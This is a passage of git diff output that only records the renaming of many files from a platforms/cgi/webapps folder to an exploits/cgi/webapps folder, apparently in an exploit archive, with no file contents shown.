exploits/cgi/webapps/26847.txt diff --git a/platforms/cgi/webapps/26848.txt b/exploits/cgi/webapps/26848.txt similarity index 100% rename from platforms/cgi/webapps/26848.txt rename to exploits/cgi/webapps/26848.txt diff --git a/platforms/cgi/webapps/26849.txt b/exploits/cgi/webapps/26849.txt similarity index 100% rename from platforms/cgi/webapps/26849.txt rename to exploits/cgi/webapps/26849.txt diff --git a/platforms/cgi/webapps/26850.txt b/exploits/cgi/webapps/26850.txt similarity index 100% rename from platforms/cgi/webapps/26850.txt rename to exploits/cgi/webapps/26850.txt diff --git a/platforms/cgi/webapps/26851.txt b/exploits/cgi/webapps/26851.txt similarity index 100% rename from platforms/cgi/webapps/26851.txt rename to exploits/cgi/webapps/26851.txt diff --git a/platforms/cgi/webapps/26852.txt b/exploits/cgi/webapps/26852.txt similarity index 100% rename from platforms/cgi/webapps/26852.txt rename to exploits/cgi/webapps/26852.txt diff --git a/platforms/cgi/webapps/26858.txt b/exploits/cgi/webapps/26858.txt similarity index 100% rename from platforms/cgi/webapps/26858.txt rename to exploits/cgi/webapps/26858.txt diff --git a/platforms/cgi/webapps/26859.txt b/exploits/cgi/webapps/26859.txt similarity index 100% rename from platforms/cgi/webapps/26859.txt rename to exploits/cgi/webapps/26859.txt diff --git a/platforms/cgi/webapps/26860.txt b/exploits/cgi/webapps/26860.txt similarity index 100% rename from platforms/cgi/webapps/26860.txt rename to exploits/cgi/webapps/26860.txt diff --git a/platforms/cgi/webapps/26861.txt b/exploits/cgi/webapps/26861.txt similarity index 100% rename from platforms/cgi/webapps/26861.txt rename to exploits/cgi/webapps/26861.txt diff --git a/platforms/cgi/webapps/26862.txt b/exploits/cgi/webapps/26862.txt similarity index 100% rename from platforms/cgi/webapps/26862.txt rename to exploits/cgi/webapps/26862.txt diff --git a/platforms/cgi/webapps/26863.txt b/exploits/cgi/webapps/26863.txt similarity index 100% rename from platforms/cgi/webapps/26863.txt rename to exploits/cgi/webapps/26863.txt diff --git a/platforms/cgi/webapps/26864.txt b/exploits/cgi/webapps/26864.txt similarity index 100% rename from platforms/cgi/webapps/26864.txt rename to exploits/cgi/webapps/26864.txt diff --git a/platforms/cgi/webapps/26865.txt b/exploits/cgi/webapps/26865.txt similarity index 100% rename from platforms/cgi/webapps/26865.txt rename to exploits/cgi/webapps/26865.txt diff --git a/platforms/cgi/webapps/26914.txt b/exploits/cgi/webapps/26914.txt similarity index 100% rename from platforms/cgi/webapps/26914.txt rename to exploits/cgi/webapps/26914.txt diff --git a/platforms/cgi/webapps/26917.txt b/exploits/cgi/webapps/26917.txt similarity index 100% rename from platforms/cgi/webapps/26917.txt rename to exploits/cgi/webapps/26917.txt diff --git a/platforms/cgi/webapps/26933.txt b/exploits/cgi/webapps/26933.txt similarity index 100% rename from platforms/cgi/webapps/26933.txt rename to exploits/cgi/webapps/26933.txt diff --git a/platforms/cgi/webapps/26937.txt b/exploits/cgi/webapps/26937.txt similarity index 100% rename from platforms/cgi/webapps/26937.txt rename to exploits/cgi/webapps/26937.txt diff --git a/platforms/cgi/webapps/27021.txt b/exploits/cgi/webapps/27021.txt similarity index 100% rename from platforms/cgi/webapps/27021.txt rename to exploits/cgi/webapps/27021.txt diff --git a/platforms/cgi/webapps/27061.txt b/exploits/cgi/webapps/27061.txt similarity index 100% rename from platforms/cgi/webapps/27061.txt rename to exploits/cgi/webapps/27061.txt diff --git a/platforms/cgi/webapps/27062.txt b/exploits/cgi/webapps/27062.txt similarity index 100% rename from platforms/cgi/webapps/27062.txt rename to exploits/cgi/webapps/27062.txt diff --git a/platforms/cgi/webapps/27081.txt b/exploits/cgi/webapps/27081.txt similarity index 100% rename from platforms/cgi/webapps/27081.txt rename to exploits/cgi/webapps/27081.txt diff --git a/platforms/cgi/webapps/27088.txt b/exploits/cgi/webapps/27088.txt similarity index 100% rename from platforms/cgi/webapps/27088.txt rename to exploits/cgi/webapps/27088.txt diff --git a/platforms/cgi/webapps/27091.txt b/exploits/cgi/webapps/27091.txt similarity index 100% rename from platforms/cgi/webapps/27091.txt rename to exploits/cgi/webapps/27091.txt diff --git a/platforms/cgi/webapps/27115.txt b/exploits/cgi/webapps/27115.txt similarity index 100% rename from platforms/cgi/webapps/27115.txt rename to exploits/cgi/webapps/27115.txt diff --git a/platforms/cgi/webapps/27141.txt b/exploits/cgi/webapps/27141.txt similarity index 100% rename from platforms/cgi/webapps/27141.txt rename to exploits/cgi/webapps/27141.txt diff --git a/platforms/cgi/webapps/27163.txt b/exploits/cgi/webapps/27163.txt similarity index 100% rename from platforms/cgi/webapps/27163.txt rename to exploits/cgi/webapps/27163.txt diff --git a/platforms/cgi/webapps/27451.txt b/exploits/cgi/webapps/27451.txt similarity index 100% rename from platforms/cgi/webapps/27451.txt rename to exploits/cgi/webapps/27451.txt diff --git a/platforms/cgi/webapps/27464.txt b/exploits/cgi/webapps/27464.txt similarity index 100% rename from platforms/cgi/webapps/27464.txt rename to exploits/cgi/webapps/27464.txt diff --git a/platforms/cgi/webapps/27488.txt b/exploits/cgi/webapps/27488.txt similarity index 100% rename from platforms/cgi/webapps/27488.txt rename to exploits/cgi/webapps/27488.txt diff --git a/platforms/cgi/webapps/27561.txt b/exploits/cgi/webapps/27561.txt similarity index 100% rename from platforms/cgi/webapps/27561.txt rename to exploits/cgi/webapps/27561.txt diff --git a/platforms/cgi/webapps/27562.txt b/exploits/cgi/webapps/27562.txt similarity index 100% rename from platforms/cgi/webapps/27562.txt rename to exploits/cgi/webapps/27562.txt diff --git a/platforms/cgi/webapps/27583.txt b/exploits/cgi/webapps/27583.txt similarity index 100% rename from platforms/cgi/webapps/27583.txt rename to exploits/cgi/webapps/27583.txt diff --git a/platforms/cgi/webapps/27594.txt b/exploits/cgi/webapps/27594.txt similarity index 100% rename from platforms/cgi/webapps/27594.txt rename to exploits/cgi/webapps/27594.txt diff --git a/platforms/cgi/webapps/27620.txt b/exploits/cgi/webapps/27620.txt similarity index 100% rename from platforms/cgi/webapps/27620.txt rename to exploits/cgi/webapps/27620.txt diff --git a/platforms/cgi/webapps/27631.txt b/exploits/cgi/webapps/27631.txt similarity index 100% rename from platforms/cgi/webapps/27631.txt rename to exploits/cgi/webapps/27631.txt diff --git a/platforms/cgi/webapps/27672.txt b/exploits/cgi/webapps/27672.txt similarity index 100% rename from platforms/cgi/webapps/27672.txt rename to exploits/cgi/webapps/27672.txt diff --git a/platforms/cgi/webapps/27679.txt b/exploits/cgi/webapps/27679.txt similarity index 100% rename from platforms/cgi/webapps/27679.txt rename to exploits/cgi/webapps/27679.txt diff --git a/platforms/cgi/webapps/27680.txt b/exploits/cgi/webapps/27680.txt similarity index 100% rename from platforms/cgi/webapps/27680.txt rename to exploits/cgi/webapps/27680.txt diff --git a/platforms/cgi/webapps/27681.txt b/exploits/cgi/webapps/27681.txt similarity index 100% rename from platforms/cgi/webapps/27681.txt rename to exploits/cgi/webapps/27681.txt diff --git a/platforms/cgi/webapps/27682.txt b/exploits/cgi/webapps/27682.txt similarity index 100% rename from platforms/cgi/webapps/27682.txt rename to exploits/cgi/webapps/27682.txt diff --git a/platforms/cgi/webapps/27683.txt b/exploits/cgi/webapps/27683.txt similarity index 100% rename from platforms/cgi/webapps/27683.txt rename to exploits/cgi/webapps/27683.txt diff --git a/platforms/cgi/webapps/27685.txt b/exploits/cgi/webapps/27685.txt similarity index 100% rename from platforms/cgi/webapps/27685.txt rename to exploits/cgi/webapps/27685.txt diff --git a/platforms/cgi/webapps/27686.txt b/exploits/cgi/webapps/27686.txt similarity index 100% rename from platforms/cgi/webapps/27686.txt rename to exploits/cgi/webapps/27686.txt diff --git a/platforms/cgi/webapps/27689.txt b/exploits/cgi/webapps/27689.txt similarity index 100% rename from platforms/cgi/webapps/27689.txt rename to exploits/cgi/webapps/27689.txt diff --git a/platforms/cgi/webapps/27690.txt b/exploits/cgi/webapps/27690.txt similarity index 100% rename from platforms/cgi/webapps/27690.txt rename to exploits/cgi/webapps/27690.txt diff --git a/platforms/cgi/webapps/27691.txt b/exploits/cgi/webapps/27691.txt similarity index 100% rename from platforms/cgi/webapps/27691.txt rename to exploits/cgi/webapps/27691.txt diff --git a/platforms/cgi/webapps/27694.txt b/exploits/cgi/webapps/27694.txt similarity index 100% rename from platforms/cgi/webapps/27694.txt rename to exploits/cgi/webapps/27694.txt diff --git a/platforms/cgi/webapps/27695.txt b/exploits/cgi/webapps/27695.txt similarity index 100% rename from platforms/cgi/webapps/27695.txt rename to exploits/cgi/webapps/27695.txt diff --git a/platforms/cgi/webapps/27696.txt b/exploits/cgi/webapps/27696.txt similarity index 100% rename from platforms/cgi/webapps/27696.txt rename to exploits/cgi/webapps/27696.txt diff --git a/platforms/cgi/webapps/27697.txt b/exploits/cgi/webapps/27697.txt similarity index 100% rename from platforms/cgi/webapps/27697.txt rename to exploits/cgi/webapps/27697.txt diff --git a/platforms/cgi/webapps/27712.txt b/exploits/cgi/webapps/27712.txt similarity index 100% rename from platforms/cgi/webapps/27712.txt rename to exploits/cgi/webapps/27712.txt diff --git a/platforms/cgi/webapps/27728.txt b/exploits/cgi/webapps/27728.txt similarity index 100% rename from platforms/cgi/webapps/27728.txt rename to exploits/cgi/webapps/27728.txt diff --git a/platforms/cgi/webapps/27761.txt b/exploits/cgi/webapps/27761.txt similarity index 100% rename from platforms/cgi/webapps/27761.txt rename to exploits/cgi/webapps/27761.txt diff --git a/platforms/cgi/webapps/27895.txt b/exploits/cgi/webapps/27895.txt similarity index 100% rename from platforms/cgi/webapps/27895.txt rename to exploits/cgi/webapps/27895.txt diff --git a/platforms/cgi/webapps/28321.pl b/exploits/cgi/webapps/28321.pl similarity index 100% rename from platforms/cgi/webapps/28321.pl rename to exploits/cgi/webapps/28321.pl diff --git a/platforms/cgi/webapps/28514.txt b/exploits/cgi/webapps/28514.txt similarity index 100% rename from platforms/cgi/webapps/28514.txt rename to exploits/cgi/webapps/28514.txt diff --git a/platforms/cgi/webapps/28570.txt b/exploits/cgi/webapps/28570.txt similarity index 100% rename from platforms/cgi/webapps/28570.txt rename to exploits/cgi/webapps/28570.txt diff --git a/platforms/cgi/webapps/289.pl b/exploits/cgi/webapps/289.pl similarity index 100% rename from platforms/cgi/webapps/289.pl rename to exploits/cgi/webapps/289.pl diff --git a/platforms/cgi/webapps/29221.txt b/exploits/cgi/webapps/29221.txt similarity index 100% rename from platforms/cgi/webapps/29221.txt rename to exploits/cgi/webapps/29221.txt diff --git a/platforms/cgi/webapps/29275.txt b/exploits/cgi/webapps/29275.txt similarity index 100% rename from platforms/cgi/webapps/29275.txt rename to exploits/cgi/webapps/29275.txt diff --git a/platforms/cgi/webapps/29390.txt b/exploits/cgi/webapps/29390.txt similarity index 100% rename from platforms/cgi/webapps/29390.txt rename to exploits/cgi/webapps/29390.txt diff --git a/platforms/cgi/webapps/29391.txt b/exploits/cgi/webapps/29391.txt similarity index 100% rename from platforms/cgi/webapps/29391.txt rename to exploits/cgi/webapps/29391.txt diff --git a/platforms/cgi/webapps/29392.txt b/exploits/cgi/webapps/29392.txt similarity index 100% rename from platforms/cgi/webapps/29392.txt rename to exploits/cgi/webapps/29392.txt diff --git a/platforms/cgi/webapps/29393.txt b/exploits/cgi/webapps/29393.txt similarity index 100% rename from platforms/cgi/webapps/29393.txt rename to exploits/cgi/webapps/29393.txt diff --git a/platforms/cgi/webapps/29394.txt b/exploits/cgi/webapps/29394.txt similarity index 100% rename from platforms/cgi/webapps/29394.txt rename to exploits/cgi/webapps/29394.txt diff --git a/platforms/cgi/webapps/29395.txt b/exploits/cgi/webapps/29395.txt similarity index 100% rename from platforms/cgi/webapps/29395.txt rename to exploits/cgi/webapps/29395.txt diff --git a/platforms/cgi/webapps/29396.txt b/exploits/cgi/webapps/29396.txt similarity index 100% rename from platforms/cgi/webapps/29396.txt rename to exploits/cgi/webapps/29396.txt diff --git a/platforms/cgi/webapps/29623.txt b/exploits/cgi/webapps/29623.txt similarity index 100% rename from platforms/cgi/webapps/29623.txt rename to exploits/cgi/webapps/29623.txt diff --git a/platforms/cgi/webapps/29761.txt b/exploits/cgi/webapps/29761.txt similarity index 100% rename from platforms/cgi/webapps/29761.txt rename to exploits/cgi/webapps/29761.txt diff --git a/platforms/cgi/webapps/29842.txt b/exploits/cgi/webapps/29842.txt similarity index 100% rename from platforms/cgi/webapps/29842.txt rename to exploits/cgi/webapps/29842.txt diff --git a/platforms/cgi/webapps/29844.txt b/exploits/cgi/webapps/29844.txt similarity index 100% rename from platforms/cgi/webapps/29844.txt rename to exploits/cgi/webapps/29844.txt diff --git a/platforms/cgi/webapps/29962.txt b/exploits/cgi/webapps/29962.txt similarity index 100% rename from platforms/cgi/webapps/29962.txt rename to exploits/cgi/webapps/29962.txt diff --git a/platforms/cgi/webapps/30156.txt b/exploits/cgi/webapps/30156.txt similarity index 100% rename from platforms/cgi/webapps/30156.txt rename to exploits/cgi/webapps/30156.txt diff --git a/platforms/cgi/webapps/30199.txt b/exploits/cgi/webapps/30199.txt similarity index 100% rename from platforms/cgi/webapps/30199.txt rename to exploits/cgi/webapps/30199.txt diff --git a/platforms/cgi/webapps/30260.txt b/exploits/cgi/webapps/30260.txt similarity index 100% rename from platforms/cgi/webapps/30260.txt rename to exploits/cgi/webapps/30260.txt diff --git a/platforms/cgi/webapps/30263.txt b/exploits/cgi/webapps/30263.txt similarity index 100% rename from platforms/cgi/webapps/30263.txt rename to exploits/cgi/webapps/30263.txt diff --git a/platforms/cgi/webapps/30440.txt b/exploits/cgi/webapps/30440.txt similarity index 100% rename from platforms/cgi/webapps/30440.txt rename to exploits/cgi/webapps/30440.txt diff --git a/platforms/cgi/webapps/30475.txt b/exploits/cgi/webapps/30475.txt similarity index 100% rename from platforms/cgi/webapps/30475.txt rename to exploits/cgi/webapps/30475.txt diff --git a/platforms/cgi/webapps/30585.txt b/exploits/cgi/webapps/30585.txt similarity index 100% rename from platforms/cgi/webapps/30585.txt rename to exploits/cgi/webapps/30585.txt diff --git a/platforms/cgi/webapps/30586.txt b/exploits/cgi/webapps/30586.txt similarity index 100% rename from platforms/cgi/webapps/30586.txt rename to exploits/cgi/webapps/30586.txt diff --git a/platforms/cgi/webapps/30587.txt b/exploits/cgi/webapps/30587.txt similarity index 100% rename from platforms/cgi/webapps/30587.txt rename to exploits/cgi/webapps/30587.txt diff --git a/platforms/cgi/webapps/30591.txt b/exploits/cgi/webapps/30591.txt similarity index 100% rename from platforms/cgi/webapps/30591.txt rename to exploits/cgi/webapps/30591.txt diff --git a/platforms/cgi/webapps/30597.txt b/exploits/cgi/webapps/30597.txt similarity index 100% rename from platforms/cgi/webapps/30597.txt rename to exploits/cgi/webapps/30597.txt diff --git a/platforms/cgi/webapps/30598.txt b/exploits/cgi/webapps/30598.txt similarity index 100% rename from platforms/cgi/webapps/30598.txt rename to exploits/cgi/webapps/30598.txt diff --git a/platforms/cgi/webapps/30599.txt b/exploits/cgi/webapps/30599.txt similarity index 100% rename from platforms/cgi/webapps/30599.txt rename to exploits/cgi/webapps/30599.txt diff --git a/platforms/cgi/webapps/30606.txt b/exploits/cgi/webapps/30606.txt similarity index 100% rename from platforms/cgi/webapps/30606.txt rename to exploits/cgi/webapps/30606.txt diff --git a/platforms/cgi/webapps/30639.txt b/exploits/cgi/webapps/30639.txt similarity index 100% rename from platforms/cgi/webapps/30639.txt rename to exploits/cgi/webapps/30639.txt diff --git a/platforms/cgi/webapps/30649.txt b/exploits/cgi/webapps/30649.txt similarity index 100% rename from platforms/cgi/webapps/30649.txt rename to exploits/cgi/webapps/30649.txt diff --git a/platforms/cgi/webapps/3065.txt b/exploits/cgi/webapps/3065.txt similarity index 100% rename from platforms/cgi/webapps/3065.txt rename to exploits/cgi/webapps/3065.txt diff --git a/platforms/cgi/webapps/30661.txt b/exploits/cgi/webapps/30661.txt similarity index 100% rename from platforms/cgi/webapps/30661.txt rename to exploits/cgi/webapps/30661.txt diff --git a/platforms/cgi/webapps/30759.txt b/exploits/cgi/webapps/30759.txt similarity index 100% rename from platforms/cgi/webapps/30759.txt rename to exploits/cgi/webapps/30759.txt diff --git a/platforms/cgi/webapps/30770.txt b/exploits/cgi/webapps/30770.txt similarity index 100% rename from platforms/cgi/webapps/30770.txt rename to exploits/cgi/webapps/30770.txt diff --git a/platforms/cgi/webapps/30777.txt b/exploits/cgi/webapps/30777.txt similarity index 100% rename from platforms/cgi/webapps/30777.txt rename to exploits/cgi/webapps/30777.txt diff --git a/platforms/cgi/webapps/30795.txt b/exploits/cgi/webapps/30795.txt similarity index 100% rename from platforms/cgi/webapps/30795.txt rename to exploits/cgi/webapps/30795.txt diff --git a/platforms/cgi/webapps/30808.txt b/exploits/cgi/webapps/30808.txt similarity index 100% rename from platforms/cgi/webapps/30808.txt rename to exploits/cgi/webapps/30808.txt diff --git a/platforms/cgi/webapps/30818.txt b/exploits/cgi/webapps/30818.txt similarity index 100% rename from platforms/cgi/webapps/30818.txt rename to exploits/cgi/webapps/30818.txt diff --git a/platforms/cgi/webapps/30919.txt b/exploits/cgi/webapps/30919.txt similarity index 100% rename from platforms/cgi/webapps/30919.txt rename to exploits/cgi/webapps/30919.txt diff --git a/platforms/cgi/webapps/30975.txt b/exploits/cgi/webapps/30975.txt similarity index 100% rename from platforms/cgi/webapps/30975.txt rename to exploits/cgi/webapps/30975.txt diff --git a/platforms/cgi/webapps/31025.txt b/exploits/cgi/webapps/31025.txt similarity index 100% rename from platforms/cgi/webapps/31025.txt rename to exploits/cgi/webapps/31025.txt diff --git a/platforms/cgi/webapps/31043.txt b/exploits/cgi/webapps/31043.txt similarity index 100% rename from platforms/cgi/webapps/31043.txt rename to exploits/cgi/webapps/31043.txt diff --git a/platforms/cgi/webapps/31071.txt b/exploits/cgi/webapps/31071.txt similarity index 100% rename from platforms/cgi/webapps/31071.txt rename to exploits/cgi/webapps/31071.txt diff --git a/platforms/cgi/webapps/31081.txt b/exploits/cgi/webapps/31081.txt similarity index 100% rename from platforms/cgi/webapps/31081.txt rename to exploits/cgi/webapps/31081.txt diff --git a/platforms/cgi/webapps/31313.txt b/exploits/cgi/webapps/31313.txt similarity index 100% rename from platforms/cgi/webapps/31313.txt rename to exploits/cgi/webapps/31313.txt diff --git a/platforms/cgi/webapps/31411.txt b/exploits/cgi/webapps/31411.txt similarity index 100% rename from platforms/cgi/webapps/31411.txt rename to exploits/cgi/webapps/31411.txt diff --git a/platforms/cgi/webapps/31466.txt b/exploits/cgi/webapps/31466.txt similarity index 100% rename from platforms/cgi/webapps/31466.txt rename to exploits/cgi/webapps/31466.txt diff --git a/platforms/cgi/webapps/31537.txt b/exploits/cgi/webapps/31537.txt similarity index 100% rename from platforms/cgi/webapps/31537.txt rename to exploits/cgi/webapps/31537.txt diff --git a/platforms/cgi/webapps/31538.txt b/exploits/cgi/webapps/31538.txt similarity index 100% rename from platforms/cgi/webapps/31538.txt rename to exploits/cgi/webapps/31538.txt diff --git a/platforms/cgi/webapps/31754.txt b/exploits/cgi/webapps/31754.txt similarity index 100% rename from platforms/cgi/webapps/31754.txt rename to exploits/cgi/webapps/31754.txt diff --git a/platforms/cgi/webapps/31755.txt b/exploits/cgi/webapps/31755.txt similarity index 100% rename from platforms/cgi/webapps/31755.txt rename to exploits/cgi/webapps/31755.txt diff --git a/platforms/cgi/webapps/31892.txt b/exploits/cgi/webapps/31892.txt similarity index 100% rename from platforms/cgi/webapps/31892.txt rename to exploits/cgi/webapps/31892.txt diff --git a/platforms/cgi/webapps/32094.pl b/exploits/cgi/webapps/32094.pl similarity index 100% rename from platforms/cgi/webapps/32094.pl rename to exploits/cgi/webapps/32094.pl diff --git a/platforms/cgi/webapps/32258.txt b/exploits/cgi/webapps/32258.txt similarity index 100% rename from platforms/cgi/webapps/32258.txt rename to exploits/cgi/webapps/32258.txt diff --git a/platforms/cgi/webapps/32430.txt b/exploits/cgi/webapps/32430.txt similarity index 100% rename from platforms/cgi/webapps/32430.txt rename to exploits/cgi/webapps/32430.txt diff --git a/platforms/cgi/webapps/32734.txt b/exploits/cgi/webapps/32734.txt similarity index 100% rename from platforms/cgi/webapps/32734.txt rename to exploits/cgi/webapps/32734.txt diff --git a/platforms/cgi/webapps/32746.txt b/exploits/cgi/webapps/32746.txt similarity index 100% rename from platforms/cgi/webapps/32746.txt rename to exploits/cgi/webapps/32746.txt diff --git a/platforms/cgi/webapps/32768.pl b/exploits/cgi/webapps/32768.pl similarity index 100% rename from platforms/cgi/webapps/32768.pl rename to exploits/cgi/webapps/32768.pl diff --git a/platforms/cgi/webapps/32870.txt b/exploits/cgi/webapps/32870.txt similarity index 100% rename from platforms/cgi/webapps/32870.txt rename to exploits/cgi/webapps/32870.txt diff --git a/platforms/cgi/webapps/32907.txt b/exploits/cgi/webapps/32907.txt similarity index 100% rename from platforms/cgi/webapps/32907.txt rename to exploits/cgi/webapps/32907.txt diff --git a/platforms/cgi/webapps/33231.txt b/exploits/cgi/webapps/33231.txt similarity index 100% rename from platforms/cgi/webapps/33231.txt rename to exploits/cgi/webapps/33231.txt diff --git a/platforms/cgi/webapps/33334.txt b/exploits/cgi/webapps/33334.txt similarity index 100% rename from platforms/cgi/webapps/33334.txt rename to exploits/cgi/webapps/33334.txt diff --git a/platforms/cgi/webapps/33494.txt b/exploits/cgi/webapps/33494.txt similarity index 100% rename from platforms/cgi/webapps/33494.txt rename to exploits/cgi/webapps/33494.txt diff --git a/platforms/cgi/webapps/33887.txt b/exploits/cgi/webapps/33887.txt similarity index 100% rename from platforms/cgi/webapps/33887.txt rename to exploits/cgi/webapps/33887.txt diff --git a/platforms/cgi/webapps/33958.txt b/exploits/cgi/webapps/33958.txt similarity index 100% rename from platforms/cgi/webapps/33958.txt rename to exploits/cgi/webapps/33958.txt diff --git a/platforms/cgi/webapps/34080.txt b/exploits/cgi/webapps/34080.txt similarity index 100% rename from platforms/cgi/webapps/34080.txt rename to exploits/cgi/webapps/34080.txt diff --git a/platforms/cgi/webapps/34103.txt b/exploits/cgi/webapps/34103.txt similarity index 100% rename from platforms/cgi/webapps/34103.txt rename to exploits/cgi/webapps/34103.txt diff --git a/platforms/cgi/webapps/3412.txt b/exploits/cgi/webapps/3412.txt similarity index 100% rename from platforms/cgi/webapps/3412.txt rename to exploits/cgi/webapps/3412.txt diff --git a/platforms/cgi/webapps/34223.txt b/exploits/cgi/webapps/34223.txt similarity index 100% rename from platforms/cgi/webapps/34223.txt rename to exploits/cgi/webapps/34223.txt diff --git a/platforms/cgi/webapps/34347.txt b/exploits/cgi/webapps/34347.txt similarity index 100% rename from platforms/cgi/webapps/34347.txt rename to exploits/cgi/webapps/34347.txt diff --git a/platforms/cgi/webapps/34420.txt b/exploits/cgi/webapps/34420.txt similarity index 100% rename from platforms/cgi/webapps/34420.txt rename to exploits/cgi/webapps/34420.txt diff --git a/platforms/cgi/webapps/34794.txt b/exploits/cgi/webapps/34794.txt similarity index 100% rename from platforms/cgi/webapps/34794.txt rename to exploits/cgi/webapps/34794.txt diff --git a/platforms/cgi/webapps/34839.py b/exploits/cgi/webapps/34839.py similarity index 100% rename from platforms/cgi/webapps/34839.py rename to exploits/cgi/webapps/34839.py diff --git a/platforms/cgi/webapps/34895.rb b/exploits/cgi/webapps/34895.rb similarity index 100% rename from platforms/cgi/webapps/34895.rb rename to exploits/cgi/webapps/34895.rb diff --git a/platforms/cgi/webapps/34918.txt b/exploits/cgi/webapps/34918.txt similarity index 100% rename from platforms/cgi/webapps/34918.txt rename to exploits/cgi/webapps/34918.txt diff --git a/platforms/cgi/webapps/34994.txt b/exploits/cgi/webapps/34994.txt similarity index 100% rename from platforms/cgi/webapps/34994.txt rename to exploits/cgi/webapps/34994.txt diff --git a/platforms/cgi/webapps/35008.txt b/exploits/cgi/webapps/35008.txt similarity index 100% rename from platforms/cgi/webapps/35008.txt rename to exploits/cgi/webapps/35008.txt diff --git a/platforms/cgi/webapps/35015.txt b/exploits/cgi/webapps/35015.txt similarity index 100% rename from platforms/cgi/webapps/35015.txt rename to exploits/cgi/webapps/35015.txt diff --git a/platforms/cgi/webapps/35035.txt b/exploits/cgi/webapps/35035.txt similarity index 100% rename from platforms/cgi/webapps/35035.txt rename to exploits/cgi/webapps/35035.txt diff --git a/platforms/cgi/webapps/35085.txt b/exploits/cgi/webapps/35085.txt similarity index 100% rename from platforms/cgi/webapps/35085.txt rename to exploits/cgi/webapps/35085.txt diff --git a/platforms/cgi/webapps/35093.txt b/exploits/cgi/webapps/35093.txt similarity index 100% rename from platforms/cgi/webapps/35093.txt rename to exploits/cgi/webapps/35093.txt diff --git a/platforms/cgi/webapps/35357.txt b/exploits/cgi/webapps/35357.txt similarity index 100% rename from platforms/cgi/webapps/35357.txt rename to exploits/cgi/webapps/35357.txt diff --git a/platforms/cgi/webapps/35383.rb b/exploits/cgi/webapps/35383.rb similarity index 100% rename from platforms/cgi/webapps/35383.rb rename to exploits/cgi/webapps/35383.rb diff --git a/platforms/cgi/webapps/35384.rb b/exploits/cgi/webapps/35384.rb similarity index 100% rename from platforms/cgi/webapps/35384.rb rename to exploits/cgi/webapps/35384.rb diff --git a/platforms/cgi/webapps/35438.txt b/exploits/cgi/webapps/35438.txt similarity index 100% rename from platforms/cgi/webapps/35438.txt rename to exploits/cgi/webapps/35438.txt diff --git a/platforms/cgi/webapps/35463.txt b/exploits/cgi/webapps/35463.txt similarity index 100% rename from platforms/cgi/webapps/35463.txt rename to exploits/cgi/webapps/35463.txt diff --git a/platforms/cgi/webapps/35676.txt b/exploits/cgi/webapps/35676.txt similarity index 100% rename from platforms/cgi/webapps/35676.txt rename to exploits/cgi/webapps/35676.txt diff --git a/platforms/cgi/webapps/35698.txt b/exploits/cgi/webapps/35698.txt similarity index 100% rename from platforms/cgi/webapps/35698.txt rename to exploits/cgi/webapps/35698.txt diff --git a/platforms/cgi/webapps/35802.txt b/exploits/cgi/webapps/35802.txt similarity index 100% rename from platforms/cgi/webapps/35802.txt rename to exploits/cgi/webapps/35802.txt diff --git a/platforms/cgi/webapps/35900.txt b/exploits/cgi/webapps/35900.txt similarity index 100% rename from platforms/cgi/webapps/35900.txt rename to exploits/cgi/webapps/35900.txt diff --git a/platforms/cgi/webapps/36057.txt b/exploits/cgi/webapps/36057.txt similarity index 100% rename from platforms/cgi/webapps/36057.txt rename to exploits/cgi/webapps/36057.txt diff --git a/platforms/cgi/webapps/36457.txt b/exploits/cgi/webapps/36457.txt similarity index 100% rename from platforms/cgi/webapps/36457.txt rename to exploits/cgi/webapps/36457.txt diff --git a/platforms/cgi/webapps/36458.txt b/exploits/cgi/webapps/36458.txt similarity index 100% rename from platforms/cgi/webapps/36458.txt rename to exploits/cgi/webapps/36458.txt diff --git a/platforms/cgi/webapps/36459.txt b/exploits/cgi/webapps/36459.txt similarity index 100% rename from platforms/cgi/webapps/36459.txt rename to exploits/cgi/webapps/36459.txt diff --git a/platforms/cgi/webapps/36772.txt b/exploits/cgi/webapps/36772.txt similarity index 100% rename from platforms/cgi/webapps/36772.txt rename to exploits/cgi/webapps/36772.txt diff --git a/platforms/cgi/webapps/36940.txt b/exploits/cgi/webapps/36940.txt similarity index 100% rename from platforms/cgi/webapps/36940.txt rename to exploits/cgi/webapps/36940.txt diff --git a/platforms/cgi/webapps/36974.txt b/exploits/cgi/webapps/36974.txt similarity index 100% rename from platforms/cgi/webapps/36974.txt rename to exploits/cgi/webapps/36974.txt diff --git a/platforms/cgi/webapps/36976.txt b/exploits/cgi/webapps/36976.txt similarity index 100% rename from platforms/cgi/webapps/36976.txt rename to exploits/cgi/webapps/36976.txt diff --git a/platforms/cgi/webapps/36994.txt b/exploits/cgi/webapps/36994.txt similarity index 100% rename from platforms/cgi/webapps/36994.txt rename to exploits/cgi/webapps/36994.txt diff --git a/platforms/cgi/webapps/37084.txt b/exploits/cgi/webapps/37084.txt similarity index 100% rename from platforms/cgi/webapps/37084.txt rename to exploits/cgi/webapps/37084.txt diff --git a/platforms/cgi/webapps/37549.txt b/exploits/cgi/webapps/37549.txt similarity index 100% rename from platforms/cgi/webapps/37549.txt rename to exploits/cgi/webapps/37549.txt diff --git a/platforms/cgi/webapps/37638.txt b/exploits/cgi/webapps/37638.txt similarity index 100% rename from platforms/cgi/webapps/37638.txt rename to exploits/cgi/webapps/37638.txt diff --git a/platforms/cgi/webapps/37806.txt b/exploits/cgi/webapps/37806.txt similarity index 100% rename from platforms/cgi/webapps/37806.txt rename to exploits/cgi/webapps/37806.txt diff --git a/platforms/cgi/webapps/37830.txt b/exploits/cgi/webapps/37830.txt similarity index 100% rename from platforms/cgi/webapps/37830.txt rename to exploits/cgi/webapps/37830.txt diff --git a/platforms/cgi/webapps/38114.html b/exploits/cgi/webapps/38114.html similarity index 100% rename from platforms/cgi/webapps/38114.html rename to exploits/cgi/webapps/38114.html diff --git a/platforms/cgi/webapps/38128.txt b/exploits/cgi/webapps/38128.txt similarity index 100% rename from platforms/cgi/webapps/38128.txt rename to exploits/cgi/webapps/38128.txt diff --git a/platforms/cgi/webapps/38316.txt b/exploits/cgi/webapps/38316.txt similarity index 100% rename from platforms/cgi/webapps/38316.txt rename to exploits/cgi/webapps/38316.txt diff --git a/platforms/cgi/webapps/38550.txt b/exploits/cgi/webapps/38550.txt similarity index 100% rename from platforms/cgi/webapps/38550.txt rename to exploits/cgi/webapps/38550.txt diff --git a/platforms/cgi/webapps/38593.txt b/exploits/cgi/webapps/38593.txt similarity index 100% rename from platforms/cgi/webapps/38593.txt rename to exploits/cgi/webapps/38593.txt diff --git a/platforms/cgi/webapps/38691.txt b/exploits/cgi/webapps/38691.txt similarity index 100% rename from platforms/cgi/webapps/38691.txt rename to exploits/cgi/webapps/38691.txt diff --git a/platforms/cgi/webapps/38776.txt b/exploits/cgi/webapps/38776.txt 